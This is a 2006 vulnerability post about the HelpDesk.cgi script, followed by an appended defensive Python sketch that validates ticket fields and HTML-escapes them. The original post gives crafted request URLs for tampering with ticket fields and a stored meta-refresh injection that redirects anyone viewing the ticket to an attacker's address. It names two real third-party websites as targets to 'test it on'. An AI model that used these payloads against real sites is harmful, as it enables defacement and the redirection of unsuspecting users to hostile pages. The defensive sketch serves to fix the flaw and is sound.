
From:crackers_child_(at)_sibersavascilar.com <crackers_child_(at)_sibersavascilar.com>
Date:17.08.2006
Subject:HelpDesk.cgi Vulnerability

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------

Title : HelpDesk.cgi Vulnerability

--------------------------------------------------------------------------------
#Author: Crackers_Child


#cont@ct: crackers_child@sibersavascilar.com

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

Usage:

http://[target]/[helpdesk_path]/helpdesk.cgi?probtype=hardware&problem=Describe+your+problem.%0D%0A&name=mitt&submit=Submit+Problem

you can change it :)

http://[target]/[helpdesk_path]/helpdesk.cgi?probtype=HACKED&problem=Describe+your+problem.%0D%0A&name=HACKED&submit=HCKED

test it on

http://www.basementnerds.com/cgi-bin/helpdesk/helpdesk.cgi?probtype=hardware&problem=Describe+your+problem.%0D%0A&name=mitt&submit=Submit+Problem

--
other exploit is you can write your problems and you can use good codes :)

your name = crackers

your phone =4564fasgf

mail = crackers_child@sibersavascilar.com

subject = problem

message = <meta http-equiv="refresh" content="0;URL=http://your address">

test it on

http://www.pa.msu.edu/helpdesk/helpdesk.cgi?main=1&mode=2


:)

--------------------------------------------------------------------------------

greets:

X_ALPEREN_X,Root_MOr And All Other Friends

--------------------------------------------------------------------------------
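
Added example (not part of the original post and not HelpDesk.cgi's own code): a server-side sketch of the two checks whose absence the requests above rely on, namely validating the submitted fields and HTML-encoding them before they are written into a ticket page. It assumes the script echoes the submitted fields into HTML unescaped, as the meta refresh example implies; the function names, the length limits and every category other than "hardware" are hypothetical.

```python
import html
from urllib.parse import parse_qs

# Assumed allowlist: only "hardware" appears in the advisory, the rest is hypothetical.
ALLOWED_PROBTYPES = {"hardware", "software", "network"}
MAX_NAME, MAX_PROBLEM = 64, 2000  # assumed limits


class RejectedTicket(ValueError):
    """Raised when a submitted field fails validation."""


def _one(params, key):
    # Duplicate or missing parameters are rejected instead of guessed at.
    values = params.get(key, [])
    if len(values) != 1:
        raise RejectedTicket(f"{key}: expected exactly one value")
    return values[0]


def parse_ticket(query_string):
    """Validate the fields used in the advisory's request; return a clean dict."""
    params = parse_qs(query_string, keep_blank_values=True)
    probtype = _one(params, "probtype")
    if probtype not in ALLOWED_PROBTYPES:
        raise RejectedTicket("probtype: not an allowed category")
    name = _one(params, "name").strip()
    if not name or len(name) > MAX_NAME or any(ord(c) < 0x20 for c in name):
        raise RejectedTicket("name: empty, too long or contains control characters")
    # %0D%0A decodes to CRLF; normalise it and refuse other control characters.
    problem = _one(params, "problem").replace("\r\n", "\n").strip()
    if not problem or len(problem) > MAX_PROBLEM:
        raise RejectedTicket("problem: empty or too long")
    if any(ord(c) < 0x20 and c not in "\n\t" for c in problem):
        raise RejectedTicket("problem: contains control characters")
    return {"probtype": probtype, "name": name, "problem": problem}


def render_ticket(ticket):
    """Encode on output: stored text is escaped every time it reaches HTML."""
    esc = {k: html.escape(v, quote=True) for k, v in ticket.items()}
    return (f"<tr><td>{esc['probtype']}</td><td>{esc['name']}</td>"
            f"<td><pre>{esc['problem']}</pre></td></tr>")
```

With output encoding in place, a ticket body containing the meta tag is displayed as text instead of being interpreted by the browser of whoever opens the ticket.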
